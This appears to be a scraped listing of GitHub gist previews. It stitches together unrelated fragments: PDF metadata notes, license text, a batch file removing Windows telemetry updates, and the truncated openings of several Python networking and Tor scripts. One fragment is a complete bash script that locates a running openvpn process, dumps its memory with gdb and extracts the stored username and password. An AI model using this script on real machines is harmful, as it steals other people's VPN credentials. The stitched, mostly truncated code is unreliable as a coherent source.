Metadata in PDF files can be stored in at least two places:
- the Info Dictionary, a limited set of key/value pairs
- XMP packets, which contain RDF statements expressed as XML
This is free and unencumbered software released into the public domain. | |
Anyone is free to copy, modify, publish, use, compile, sell, or | |
distribute this software, either in source code form or as a compiled | |
binary, for any purpose, commercial or non-commercial, and by any | |
means. | |
In jurisdictions that recognize copyright laws, the author or authors | |
of this software dedicate any and all copyright interest in the | |
software to the public domain. We make this dedication for the benefit |
# coding=utf-8 | |
""" | |
LICENSE http://www.apache.org/licenses/LICENSE-2.0 | |
""" | |
import datetime | |
import sys | |
import time | |
import threading | |
import traceback | |
import SocketServer |
This is a collection of snippets, not a comprehensive guide. I suggest you start with Operational PGP.
Here is an incomplete list of things that are different from other approaches:
@echo off | |
echo Uninstalling KB3075249 (telemetry for Win7/8.1) | |
start /w wusa.exe /uninstall /kb:3075249 /quiet /norestart | |
echo Uninstalling KB3080149 (telemetry for Win7/8.1) | |
start /w wusa.exe /uninstall /kb:3080149 /quiet /norestart | |
echo Uninstalling KB3021917 (telemetry for Win7) | |
start /w wusa.exe /uninstall /kb:3021917 /quiet /norestart | |
echo Uninstalling KB3022345 (telemetry) | |
start /w wusa.exe /uninstall /kb:3022345 /quiet /norestart | |
echo Uninstalling KB3068708 (telemetry) |
#!/bin/bash | |
# This little hack-job will grab credentials from a running openvpn process in Linux | |
# Keep in mind this won't work if the user used the --auth-nocache flag | |
pid=$(ps -efww | grep -v grep | grep openvpn | awk '{print $2}') | |
echo $pid | grep rw-p /proc/$pid/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done | |
echo "Your credentials should be listed below as username/password" | |
strings *.dump | awk 'NR>=3 && NR<=4 { print }' | |
rm *.dump --force |
import io | |
import socks | |
import socket | |
import urllib2 | |
import stem.process | |
from stem.util import term | |
SOCKS_PORT = 7000 | |
def create_connection(address, timeout=None, source_address=None): |
import requests | |
import os | |
proxies = { | |
'http': 'http://127.0.0.1:8080', | |
'https': 'http://127.0.0.1:8080', | |
} | |
protocol = 'https' | |
xsrf = 'xsrf-token' |
#!/usr/bin/env python | |
#DiabloHorn https://diablohorn.com | |
#raw python pcap creater | |
#based on | |
# http://askldjd.com/2014/01/15/a-reasonably-fast-python-ip-sniffer/ | |
#additional references | |
# http://www.kanadas.com/program-e/2014/08/raw_socket_communication_on_li.html | |
import sys | |
import time |